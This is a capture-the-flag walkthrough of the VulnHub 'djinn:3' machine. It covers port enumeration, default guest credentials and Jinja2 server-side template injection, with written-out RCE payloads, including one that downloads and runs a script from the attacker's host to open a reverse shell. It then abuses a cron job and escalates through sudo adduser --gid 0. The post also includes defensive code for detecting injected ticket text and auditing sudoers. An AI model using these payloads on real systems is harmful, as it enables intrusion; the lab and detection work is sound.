djinn:3 vulnhub Walkthrough

I am back with another article, which is going to be full of new methods and privilege escalation techniques. The only reason I was not writing any blog posts was this VM (djinn3, a very good VM from VulnHub), and finally, after a lot of failures, I got root on it. Okay, so let's start.


Walkthrough



IP of the target : 192.168.1.55

As usual, I started with an nmap scan to find the open ports and the services running on the system, using the command


nmap -sC -sV -Pn 192.168.1.55

I got quite a few open ports; maybe port 80 can help me with the enumeration, so let's start from there.

Okay, we have a website on port 80. I tried visiting every page listed in the nav bar but got nothing, so now it's time for directory brute-forcing. I personally like wfuzz because of its cleaner interface (you can use any tool you want).


wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --hc 404 http://192.168.1.55/FUZZ

This got nothing except /images with a 301 and /~checkout~ with a 403. Then I changed my wordlist to /dirb/big.txt and still got nothing except /~sys~, which is also forbidden. I don't know whether the ~checkout~ and ~sys~ directories are going to be useful for me or not, so I proceeded to the next port, 5000.


Here we have ticketing software. The most interesting line I found is "Under Development", which suggests this web app may have security issues. I clicked on the open link and found another web page with a GET parameter "id".

Hmm, smells like SQL injection, but it was not. I tried a lot but got nothing :(

Okay, the next port we have is 31337. I tried connecting to it using nc.

I tried almost every common username and password, but none of them worked. Then I started searching the internet for common default credentials and found one with

username => guest

password => guest

And yes, this worked. I was feeling so dumb at this point; how could I forget such an easy password :(

Anyway, let's continue with the application we have on port 31337.

There are many options here. I started with close (close an existing ticket).

I tried to close a non-existent ticket with id 1234 and got no output. Next I tried with a valid ticket id I had found on port 5000, 2973, and after this I visited the page on port 5000 again, and yes, this ticket is actually deleted.

The next option I tried was opening a new ticket.

Again I visited the page on port 5000 and found a new ticket with the title "check", which means this function is working too. I tried including some file names like /etc/passwd to check whether we could get LFI or RFI here, but got nothing; after spending a lot of time with this application I still had nothing.

I checked the nmap scan again and found this line: 5000/tcp open http Werkzeug

Searching on Google about this revealed useful information.

Hmm, that was a big hint for me: it means the whole application is developed using Flask, and Flask applications can be vulnerable to SSTI (Server-Side Template Injection). I found a GitHub repository, something like PayloadsAllTheThings, and after working with it I found that this application is using Jinja2, because if we give {{7*'7'}} as input then the output is 7777777.

Again I opened the web app on port 5000, clicked on the link, and got this result.


I was on the right path, but "some payloads don't work exactly the way they are written", so after a lot of tries to get RCE from SSTI I succeeded with the payload


{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Now I just had to pop a shell. Without any further checking I assumed that this system had PHP installed, uploaded the pentestmonkey reverse shell to the /tmp directory, and wasted almost 10 minutes trying to figure out why this PHP script was not executing. So I changed my command to


{{config.__class__.__init__.__globals__['os'].popen('ls /usr/bin/').read()}}

and using this I found that Python is installed, so I can use a Python script to pop a shell (again I was feeling so dumb); how could I forget to check whether PHP was there or not?


{{config.__class__.__init__.__globals__['os'].popen('wget http://192.168.1.103:8000/exp.py -O /tmp/exp.py').read()}}

I opened the web page on port 5000, and after I clicked on the link my Python script was saved to the /tmp/ directory.

Next I started a listener on port 1234 and changed the payload to


{{config.__class__.__init__.__globals__['os'].popen('python /tmp/exp.py').read()}}

and after clicking on the link I got the reverse shell :)

popped up the reverse shell :)
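The root cause of the chain above is that text submitted through the ticket service on port 31337 is later rendered as a Jinja2 template by the Flask app on port 5000, so template syntax in a ticket gets evaluated server-side. As an added defensive example, not code from the VM or from this post, here is a stdlib-only check that flags stored ticket text containing template syntax before it reaches the template engine; the ticket records are constructed.

```python
import re

# Indicators in rising order of concern: Jinja2 delimiters, attribute walks
# through Python internals, and process-execution calls.
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
DUNDER_WALK = re.compile(r"__(class|init|globals|builtins|subclasses|mro|import)__")
EXEC_CALL = re.compile(r"\b(popen|system|subprocess|exec|eval)\s*\(")

def classify(text):
    """Return (severity, matched indicators) for one ticket field."""
    hits = []
    if TEMPLATE_DELIMS.search(text):
        hits.append("template-syntax")
    if DUNDER_WALK.search(text):
        hits.append("dunder-walk")
    if EXEC_CALL.search(text):
        hits.append("exec-call")
    if not hits:
        return "clean", hits
    if "dunder-walk" in hits or "exec-call" in hits:
        return "critical", hits
    return "suspicious", hits

# Constructed sample tickets (id, title): a normal one, the post's "check",
# the 7*'7' probe, a harmless-looking placeholder, and the RCE chain from the post.
SAMPLE_TICKETS = [
    (2973, "Printer on floor 2 is offline"),
    (2980, "check"),
    (2981, "{{7*'7'}}"),
    (2982, "Widget {{ customer_name }} not responding"),
    (2983, "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"),
]

def scan_tickets(tickets):
    """Return (id, severity, indicators) for every ticket that must not be rendered as a template."""
    report = []
    for tid, title in tickets:
        severity, hits = classify(title)
        if severity != "clean":
            report.append((tid, severity, hits))
    return report

if __name__ == "__main__":
    for row in scan_tickets(SAMPLE_TICKETS):
        print(row)
```

Scanning stored text is only a detective control; the application-side fix is to pass ticket text to the template as a context variable (render_template with title=...) so it is escaped rather than compiled as template source.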

After some enumeration I found two important files in the /opt/ directory.

I transferred these files to my local system and decompiled them with uncompyle6; as a result I got two .py files.

After reading the code many times I found some important pieces of code.


Content of file1 =>

Content of file2 =>

Now, after understanding these two pieces of code, I ran pspy on the target machine and found that a cron job is running as user saint (we have three users: saint, mzfr, jack).

According to the Python code, I created a JSON file in the /tmp directory named ****.config.json which makes the cron job download my id_rsa.pub key to the path I specified (so I tried /home/saint/.ssh/authorized_keys), and yes, it worked, and now I can get access as user saint.


As we can see, the server received a response code 200, which means I am on the right path. Now, with the help of the command ssh saint@192.168.1.55, I was in as user saint.

After getting a shell as user saint I checked the user's sudo privileges using the command sudo -l and found this:

It means user saint can add a user, and if we remember the adduser command options, there is an option to specify the GID. So I used the command

sudo -u root /usr/sbin/adduser yash --gid 0


After spending some time with the system, I found that I can read the /etc/sudoers file, and found this interesting thing:

It means we need to create a new user named jason. Okay, I did the same thing after changing back to user saint.

From the sudoers file I know that user jason can run some command as root without a password, so I took help from GTFOBins and finally got root.
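The last two steps chain a sudo rule that lets saint run adduser (and so pick the GID, or create any account name) with a sudoers entry for a user, jason, that does not exist yet. As an added audit example, not the VM's files or the post's code, here is a stdlib-only check over constructed passwd and sudoers text that flags non-root accounts with primary GID 0, NOPASSWD rules, and sudoers rules naming accounts that do not exist; the NOPASSWD command is a placeholder because the post does not show it.

```python
import re

# Constructed samples (not the VM's files); the NOPASSWD command is a placeholder.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
saint:x:1001:1001::/home/saint:/bin/bash
yash:x:1004:0::/home/yash:/bin/bash
"""
SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
saint   ALL=(root) /usr/sbin/adduser
jason   ALL=(root) NOPASSWD: /PLACEHOLDER/command
"""
# Simplified sudoers user spec: user host=(runas) [TAG: ...] commands
SUDO_RULE = re.compile(
    r"^(?P<who>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def accounts(passwd_text):
    """Map account name -> primary GID from passwd-format text."""
    users = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and not line.startswith("#"):
            users[fields[0]] = fields[3]
    return users

def gid0_accounts(passwd_text):
    """Non-root accounts whose primary group is root (what adduser --gid 0 creates)."""
    return [u for u, gid in accounts(passwd_text).items() if gid == "0" and u != "root"]

def sudo_rules(sudoers_text):
    """Parse user specs into (user, runas, tags, commands); comments and Defaults skipped."""
    rules = []
    for line in sudoers_text.splitlines():
        m = SUDO_RULE.match(line.strip())
        if m and not line.lstrip().startswith(("#", "Defaults")):
            rules.append((m["who"], m["runas"], m["tags"].strip(), m["cmds"].strip()))
    return rules

def findings(passwd_text, sudoers_text):
    """Return (kind, user, detail) for GID-0 accounts, NOPASSWD rules and dangling rules."""
    out = [("gid0", u, "primary group is root") for u in gid0_accounts(passwd_text)]
    known = accounts(passwd_text)
    for who, runas, tags, cmds in sudo_rules(sudoers_text):
        if "NOPASSWD" in tags:
            out.append(("nopasswd", who, f"{cmds} as {runas}"))
        if who not in known and not who.startswith("%"):
            out.append(("dangling-rule", who, "account missing; whoever creates it inherits the grant"))
    return out
```

On a real host, feed it the contents of /etc/passwd and the output of visudo -c -f /etc/sudoers (plus /etc/sudoers.d/*), and treat any dangling rule as a finding regardless of whether adduser is currently delegated to anyone.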

And this completes our challenge. If you like the walkthrough, then please consider donating to us to keep the website advertisement-free :)


NOTE: I have blurred most of the code of those two Python files and also the name of the JSON file in the /tmp directory, because I don't want anybody to be able to get root in just 10-15 minutes. So my main motive in hiding them is that I want you to #try_harder


© 2020 by HacLabs.